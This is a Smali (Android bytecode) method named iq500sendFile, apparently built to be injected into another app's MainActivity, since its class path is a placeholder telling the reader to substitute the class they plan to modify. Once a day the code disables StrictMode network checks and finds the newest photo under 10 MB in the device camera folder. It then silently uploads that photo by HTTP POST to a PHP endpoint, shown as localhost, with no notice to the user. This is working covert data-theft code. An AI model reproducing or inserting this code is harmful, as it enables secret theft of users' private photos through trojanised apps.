.method private iq500sendFile()V
    .registers 36
    .annotation system Ldalvik/annotation/Signature;
        value = {
            "()V"
        }
    .end annotation

    .prologue
    move-object/from16 v2, p0

    sget-boolean v26, Lchange/this_path_to_the_path_of_the_class_that_you_plan_to_modify/MainActivity;->adrt$enabled:Z

    if-eqz v26, :cond_c

    move-object/from16 v26, v2

    invoke-static/range {v26 .. v26}, Lchange/this_path_to_the_path_of_the_class_that_you_plan_to_modify/MainActivity$0$debug;->iq500sendFile(Lchange/this_path_to_the_path_of_the_class_that_you_plan_to_modify/MainActivity;)V

    .line 113
    :goto_b
    return-void

    .line 43
    :cond_c
    const/16 v26, 0x0

    :try_start_e
    new-instance v27, Ljava/lang/Boolean;

    move/from16 v33, v26

    move-object/from16 v34, v27

    move-object/from16 v26, v34

    move/from16 v27, v33

    move-object/from16 v28, v34

    move/from16 v33, v27

    move-object/from16 v34, v28

    move-object/from16 v27, v34

    move/from16 v28, v33

    invoke-direct/range {v27 .. v28}, Ljava/lang/Boolean;-><init>(Z)V

    move-object/from16 v4, v26

    .line 44
    new-instance v26, Ljava/util/Date;

    move-object/from16 v33, v26

    move-object/from16 v26, v33

    move-object/from16 v27, v33

    invoke-direct/range {v27 .. v27}, Ljava/util/Date;-><init>()V

    move-object/from16 v5, v26

    .line 45
    move-object/from16 v26, v5

    invoke-virtual/range {v26 .. v26}, Ljava/util/Date;->getTime()J

    move-result-wide v26

    move-wide/from16 v6, v26

    .line 46
    move-object/from16 v26, v2

    const-string v27, "loadpref"

    const/16 v28, 0x0

    invoke-virtual/range {v26 .. v28}, Lchange/this_path_to_the_path_of_the_class_that_you_plan_to_modify/MainActivity;->getSharedPreferences(Ljava/lang/String;I)Landroid/content/SharedPreferences;

    move-result-object v26

    move-object/from16 v8, v26

    .line 47
    move-object/from16 v26, v8

    invoke-interface/range {v26 .. v26}, Landroid/content/SharedPreferences;->edit()Landroid/content/SharedPreferences$Editor;

    move-result-object v26

    move-object/from16 v9, v26

    .line 49
    move-object/from16 v26, v8

    const-string v27, "lastUpload"

    const/16 v28, 0x0

    move/from16 v0, v28

    int-to-long v0, v0

    move-wide/from16 v28, v0

    invoke-interface/range {v26 .. v29}, Landroid/content/SharedPreferences;->getLong(Ljava/lang/String;J)J

    move-result-wide v26

    move-wide/from16 v10, v26

    .line 51
    move-wide/from16 v26, v10

    const/16 v28, 0x0

    move/from16 v0, v28

    int-to-long v0, v0

    move-wide/from16 v28, v0

    cmp-long v26, v26, v28

    if-eqz v26, :cond_80

    move-wide/from16 v26, v6

    move-wide/from16 v28, v10

    sub-long v26, v26, v28

    const v28, 0x5265c00

    move/from16 v0, v28

    int-to-long v0, v0

    move-wide/from16 v28, v0

    cmp-long v26, v26, v28

    if-ltz v26, :cond_ab

    .line 53
    :cond_80
    move-object/from16 v26, v9

    const-string v27, "lastUpload"

    move-wide/from16 v28, v6

    invoke-interface/range {v26 .. v29}, Landroid/content/SharedPreferences$Editor;->putLong(Ljava/lang/String;J)Landroid/content/SharedPreferences$Editor;

    move-result-object v26

    .line 54
    move-object/from16 v26, v9

    invoke-interface/range {v26 .. v26}, Landroid/content/SharedPreferences$Editor;->commit()Z

    move-result v26

    .line 55
    const/16 v26, 0x1

    new-instance v27, Ljava/lang/Boolean;

    move/from16 v33, v26

    move-object/from16 v34, v27

    move-object/from16 v26, v34

    move/from16 v27, v33

    move-object/from16 v28, v34

    move/from16 v33, v27

    move-object/from16 v34, v28

    move-object/from16 v27, v34

    move/from16 v28, v33

    invoke-direct/range {v27 .. v28}, Ljava/lang/Boolean;-><init>(Z)V

    move-object/from16 v4, v26

    .line 59
    :cond_ab
    move-object/from16 v26, v4

    check-cast v26, Ljava/lang/Boolean;

    invoke-virtual/range {v26 .. v26}, Ljava/lang/Boolean;->booleanValue()Z
    :try_end_b2
    .catch Ljava/lang/Exception; {:try_start_e .. :try_end_b2} :catch_33c

    move-result v26

    if-eqz v26, :cond_17d

    .line 64
    :try_start_b5
    new-instance v26, Landroid/os/StrictMode$ThreadPolicy$Builder;

    move-object/from16 v33, v26

    move-object/from16 v26, v33

    move-object/from16 v27, v33

    invoke-direct/range {v27 .. v27}, Landroid/os/StrictMode$ThreadPolicy$Builder;-><init>()V

    invoke-virtual/range {v26 .. v26}, Landroid/os/StrictMode$ThreadPolicy$Builder;->permitAll()Landroid/os/StrictMode$ThreadPolicy$Builder;

    move-result-object v26

    invoke-virtual/range {v26 .. v26}, Landroid/os/StrictMode$ThreadPolicy$Builder;->build()Landroid/os/StrictMode$ThreadPolicy;

    move-result-object v26

    move-object/from16 v12, v26

    .line 65
    move-object/from16 v26, v12

    invoke-static/range {v26 .. v26}, Landroid/os/StrictMode;->setThreadPolicy(Landroid/os/StrictMode$ThreadPolicy;)V

    .line 68
    const-string v26, "/sdcard/DCIM/Camera/"

    move-object/from16 v13, v26

    .line 69
    new-instance v26, Ljava/io/File;

    move-object/from16 v33, v26

    move-object/from16 v26, v33

    move-object/from16 v27, v33

    move-object/from16 v28, v13

    invoke-direct/range {v27 .. v28}, Ljava/io/File;-><init>(Ljava/lang/String;)V

    move-object/from16 v14, v26

    .line 70
    move-object/from16 v26, v14

    invoke-virtual/range {v26 .. v26}, Ljava/io/File;->list()[Ljava/lang/String;

    move-result-object v26

    move-object/from16 v15, v26

    .line 72
    const-string v26, ""

    move-object/from16 v16, v26

    .line 75
    const/16 v26, 0x0

    move/from16 v17, v26

    :goto_f2
    move/from16 v26, v17

    move-object/from16 v27, v15

    move-object/from16 v0, v27

    array-length v0, v0

    move/from16 v27, v0

    move/from16 v0, v26

    move/from16 v1, v27

    if-lt v0, v1, :cond_17f

    .line 90
    move-object/from16 v26, v16

    const-string v27, "\n"

    invoke-virtual/range {v26 .. v27}, Ljava/lang/String;->split(Ljava/lang/String;)[Ljava/lang/String;

    move-result-object v26

    move-object/from16 v17, v26

    .line 91
    const-string v26, ""

    move-object/from16 v18, v26

    .line 92
    const/16 v26, 0x0

    move/from16 v0, v26

    int-to-long v0, v0

    move-wide/from16 v26, v0

    move-wide/from16 v19, v26

    .line 94
    const/16 v26, 0x0

    move/from16 v21, v26

    :goto_11c
    move/from16 v26, v21

    move-object/from16 v27, v17

    move-object/from16 v0, v27

    array-length v0, v0

    move/from16 v27, v0

    move/from16 v0, v26

    move/from16 v1, v27

    if-lt v0, v1, :cond_302

    .line 103
    new-instance v26, Ljava/io/File;

    move-object/from16 v33, v26

    move-object/from16 v26, v33

    move-object/from16 v27, v33

    move-object/from16 v28, v18

    invoke-direct/range {v27 .. v28}, Ljava/io/File;-><init>(Ljava/lang/String;)V

    move-object/from16 v21, v26

    .line 105
    new-instance v26, Lorg/apache/http/entity/FileEntity;

    move-object/from16 v33, v26

    move-object/from16 v26, v33

    move-object/from16 v27, v33

    move-object/from16 v28, v21

    const-string v29, "binary/octet-stream"

    invoke-direct/range {v27 .. v29}, Lorg/apache/http/entity/FileEntity;-><init>(Ljava/io/File;Ljava/lang/String;)V

    move-object/from16 v22, v26

    .line 107
    new-instance v26, Lorg/apache/http/impl/client/DefaultHttpClient;

    move-object/from16 v33, v26

    move-object/from16 v26, v33

    move-object/from16 v27, v33

    invoke-direct/range {v27 .. v27}, Lorg/apache/http/impl/client/DefaultHttpClient;-><init>()V

    move-object/from16 v23, v26

    .line 108
    new-instance v26, Lorg/apache/http/client/methods/HttpPost;

    move-object/from16 v33, v26

    move-object/from16 v26, v33

    move-object/from16 v27, v33

    const-string v28, "http://localhost/file.php"

    invoke-direct/range {v27 .. v28}, Lorg/apache/http/client/methods/HttpPost;-><init>(Ljava/lang/String;)V

    move-object/from16 v24, v26

    .line 110
    move-object/from16 v26, v24

    move-object/from16 v27, v22

    invoke-virtual/range {v26 .. v27}, Lorg/apache/http/client/methods/HttpPost;->setEntity(Lorg/apache/http/HttpEntity;)V

    .line 111
    move-object/from16 v26, v22

    const-string v27, "binary/octet-stream"

    invoke-virtual/range {v26 .. v27}, Lorg/apache/http/entity/FileEntity;->setContentType(Ljava/lang/String;)V

    .line 113
    move-object/from16 v26, v23

    move-object/from16 v27, v24

    invoke-interface/range {v26 .. v27}, Lorg/apache/http/client/HttpClient;->execute(Lorg/apache/http/client/methods/HttpUriRequest;)Lorg/apache/http/HttpResponse;

    move-result-object v26

    :cond_17d
    :goto_17d
    goto/16 :goto_b

    .line 77
    :cond_17f
    move-object/from16 v26, v15

    move/from16 v27, v17

    aget-object v26, v26, v27

    const-string v27, ".jpg"

    invoke-virtual/range {v26 .. v27}, Ljava/lang/String;->endsWith(Ljava/lang/String;)Z

    move-result v26

    new-instance v27, Ljava/lang/Boolean;

    move/from16 v33, v26

    move-object/from16 v34, v27

    move-object/from16 v26, v34

    move/from16 v27, v33

    move-object/from16 v28, v34

    move/from16 v33, v27

    move-object/from16 v34, v28

    move-object/from16 v27, v34

    move/from16 v28, v33

    invoke-direct/range {v27 .. v28}, Ljava/lang/Boolean;-><init>(Z)V

    move-object/from16 v18, v26

    .line 78
    move-object/from16 v26, v15

    move/from16 v27, v17

    aget-object v26, v26, v27

    const-string v27, ".jpeg"

    invoke-virtual/range {v26 .. v27}, Ljava/lang/String;->endsWith(Ljava/lang/String;)Z

    move-result v26

    new-instance v27, Ljava/lang/Boolean;

    move/from16 v33, v26

    move-object/from16 v34, v27

    move-object/from16 v26, v34

    move/from16 v27, v33

    move-object/from16 v28, v34

    move/from16 v33, v27

    move-object/from16 v34, v28

    move-object/from16 v27, v34

    move/from16 v28, v33

    invoke-direct/range {v27 .. v28}, Ljava/lang/Boolean;-><init>(Z)V

    move-object/from16 v19, v26

    .line 79
    move-object/from16 v26, v15

    move/from16 v27, v17

    aget-object v26, v26, v27

    const-string v27, ".png"

    invoke-virtual/range {v26 .. v27}, Ljava/lang/String;->endsWith(Ljava/lang/String;)Z

    move-result v26

    new-instance v27, Ljava/lang/Boolean;

    move/from16 v33, v26

    move-object/from16 v34, v27

    move-object/from16 v26, v34

    move/from16 v27, v33

    move-object/from16 v28, v34

    move/from16 v33, v27

    move-object/from16 v34, v28

    move-object/from16 v27, v34

    move/from16 v28, v33

    invoke-direct/range {v27 .. v28}, Ljava/lang/Boolean;-><init>(Z)V

    move-object/from16 v20, v26

    .line 80
    new-instance v26, Ljava/io/File;

    move-object/from16 v33, v26

    move-object/from16 v26, v33

    move-object/from16 v27, v33

    new-instance v28, Ljava/lang/StringBuffer;

    move-object/from16 v33, v28

    move-object/from16 v28, v33

    move-object/from16 v29, v33

    invoke-direct/range {v29 .. v29}, Ljava/lang/StringBuffer;-><init>()V

    move-object/from16 v29, v13

    invoke-virtual/range {v28 .. v29}, Ljava/lang/StringBuffer;->append(Ljava/lang/String;)Ljava/lang/StringBuffer;

    move-result-object v28

    move-object/from16 v29, v15

    move/from16 v30, v17

    aget-object v29, v29, v30

    invoke-virtual/range {v28 .. v29}, Ljava/lang/StringBuffer;->append(Ljava/lang/String;)Ljava/lang/StringBuffer;

    move-result-object v28

    invoke-virtual/range {v28 .. v28}, Ljava/lang/StringBuffer;->toString()Ljava/lang/String;

    move-result-object v28

    invoke-direct/range {v27 .. v28}, Ljava/io/File;-><init>(Ljava/lang/String;)V

    invoke-virtual/range {v26 .. v26}, Ljava/io/File;->length()J

    move-result-wide v26

    const/16 v28, 0x400

    move/from16 v0, v28

    int-to-long v0, v0

    move-wide/from16 v28, v0

    div-long v26, v26, v28

    const/16 v28, 0x400

    move/from16 v0, v28

    int-to-long v0, v0

    move-wide/from16 v28, v0

    div-long v26, v26, v28

    const/16 v28, 0xa

    move/from16 v0, v28

    int-to-long v0, v0

    move-wide/from16 v28, v0

    cmp-long v26, v26, v28

    if-lez v26, :cond_2fe

    const/16 v26, 0x0

    :goto_23b
    new-instance v27, Ljava/lang/Boolean;

    move/from16 v33, v26

    move-object/from16 v34, v27

    move-object/from16 v26, v34

    move/from16 v27, v33

    move-object/from16 v28, v34

    move/from16 v33, v27

    move-object/from16 v34, v28

    move-object/from16 v27, v34

    move/from16 v28, v33

    invoke-direct/range {v27 .. v28}, Ljava/lang/Boolean;-><init>(Z)V

    move-object/from16 v21, v26

    .line 81
    move-object/from16 v26, v18

    check-cast v26, Ljava/lang/Boolean;

    invoke-virtual/range {v26 .. v26}, Ljava/lang/Boolean;->booleanValue()Z

    move-result v26

    if-eqz v26, :cond_268

    move-object/from16 v26, v21

    check-cast v26, Ljava/lang/Boolean;

    invoke-virtual/range {v26 .. v26}, Ljava/lang/Boolean;->booleanValue()Z

    move-result v26

    if-nez v26, :cond_290

    :cond_268
    move-object/from16 v26, v19

    check-cast v26, Ljava/lang/Boolean;

    invoke-virtual/range {v26 .. v26}, Ljava/lang/Boolean;->booleanValue()Z

    move-result v26

    if-eqz v26, :cond_27c

    move-object/from16 v26, v21

    check-cast v26, Ljava/lang/Boolean;

    invoke-virtual/range {v26 .. v26}, Ljava/lang/Boolean;->booleanValue()Z

    move-result v26

    if-nez v26, :cond_290

    :cond_27c
    move-object/from16 v26, v20

    check-cast v26, Ljava/lang/Boolean;

    invoke-virtual/range {v26 .. v26}, Ljava/lang/Boolean;->booleanValue()Z

    move-result v26

    if-eqz v26, :cond_2fa

    move-object/from16 v26, v21

    check-cast v26, Ljava/lang/Boolean;

    invoke-virtual/range {v26 .. v26}, Ljava/lang/Boolean;->booleanValue()Z

    move-result v26

    if-eqz v26, :cond_2fa

    .line 83
    :cond_290
    new-instance v26, Ljava/lang/StringBuffer;

    move-object/from16 v33, v26

    move-object/from16 v26, v33

    move-object/from16 v27, v33

    invoke-direct/range {v27 .. v27}, Ljava/lang/StringBuffer;-><init>()V

    move-object/from16 v27, v16

    invoke-virtual/range {v26 .. v27}, Ljava/lang/StringBuffer;->append(Ljava/lang/String;)Ljava/lang/StringBuffer;

    move-result-object v26

    new-instance v27, Ljava/lang/StringBuffer;

    move-object/from16 v33, v27

    move-object/from16 v27, v33

    move-object/from16 v28, v33

    invoke-direct/range {v28 .. v28}, Ljava/lang/StringBuffer;-><init>()V

    move-object/from16 v28, v13

    invoke-virtual/range {v27 .. v28}, Ljava/lang/StringBuffer;->append(Ljava/lang/String;)Ljava/lang/StringBuffer;

    move-result-object v27

    move-object/from16 v28, v15

    move/from16 v29, v17

    aget-object v28, v28, v29

    invoke-virtual/range {v27 .. v28}, Ljava/lang/StringBuffer;->append(Ljava/lang/String;)Ljava/lang/StringBuffer;

    move-result-object v27

    invoke-virtual/range {v27 .. v27}, Ljava/lang/StringBuffer;->toString()Ljava/lang/String;

    move-result-object v27

    invoke-virtual/range {v26 .. v27}, Ljava/lang/StringBuffer;->append(Ljava/lang/String;)Ljava/lang/StringBuffer;

    move-result-object v26

    invoke-virtual/range {v26 .. v26}, Ljava/lang/StringBuffer;->toString()Ljava/lang/String;

    move-result-object v26

    move-object/from16 v16, v26

    .line 85
    move/from16 v26, v17

    move-object/from16 v27, v15

    move-object/from16 v0, v27

    array-length v0, v0

    move/from16 v27, v0

    const/16 v28, 0x1

    add-int/lit8 v27, v27, -0x1

    move/from16 v0, v26

    move/from16 v1, v27

    if-ge v0, v1, :cond_2fa

    .line 86
    new-instance v26, Ljava/lang/StringBuffer;

    move-object/from16 v33, v26

    move-object/from16 v26, v33

    move-object/from16 v27, v33

    invoke-direct/range {v27 .. v27}, Ljava/lang/StringBuffer;-><init>()V

    move-object/from16 v27, v16

    invoke-virtual/range {v26 .. v27}, Ljava/lang/StringBuffer;->append(Ljava/lang/String;)Ljava/lang/StringBuffer;

    move-result-object v26

    const-string v27, "\n"

    invoke-virtual/range {v26 .. v27}, Ljava/lang/StringBuffer;->append(Ljava/lang/String;)Ljava/lang/StringBuffer;

    move-result-object v26

    invoke-virtual/range {v26 .. v26}, Ljava/lang/StringBuffer;->toString()Ljava/lang/String;

    move-result-object v26

    move-object/from16 v16, v26

    .line 75
    :cond_2fa
    add-int/lit8 v17, v17, 0x1

    goto/16 :goto_f2

    .line 80
    :cond_2fe
    const/16 v26, 0x1

    goto/16 :goto_23b

    .line 96
    :cond_302
    move-wide/from16 v26, v19

    move-wide/from16 v22, v26

    .line 97
    move-wide/from16 v26, v19

    new-instance v28, Ljava/io/File;

    move-object/from16 v33, v28

    move-object/from16 v28, v33

    move-object/from16 v29, v33

    move-object/from16 v30, v17

    move/from16 v31, v21

    aget-object v30, v30, v31

    invoke-direct/range {v29 .. v30}, Ljava/io/File;-><init>(Ljava/lang/String;)V

    invoke-virtual/range {v28 .. v28}, Ljava/io/File;->lastModified()J

    move-result-wide v28

    invoke-static/range {v26 .. v29}, Ljava/lang/Math;->max(JJ)J

    move-result-wide v26

    move-wide/from16 v19, v26

    .line 98
    move-wide/from16 v26, v22

    move-wide/from16 v28, v19

    cmp-long v26, v26, v28

    if-eqz v26, :cond_333

    .line 99
    move-object/from16 v26, v17

    move/from16 v27, v21

    aget-object v26, v26, v27
    :try_end_331
    .catch Ljava/lang/Exception; {:try_start_b5 .. :try_end_331} :catch_337

    move-object/from16 v18, v26

    .line 94
    :cond_333
    add-int/lit8 v21, v21, 0x1

    goto/16 :goto_11c

    .line 113
    :catch_337
    move-exception v26

    move-object/from16 v12, v26

    goto/16 :goto_17d

    :catch_33c
    move-exception v26

    move-object/from16 v4, v26

    goto/16 :goto_17d
.end method
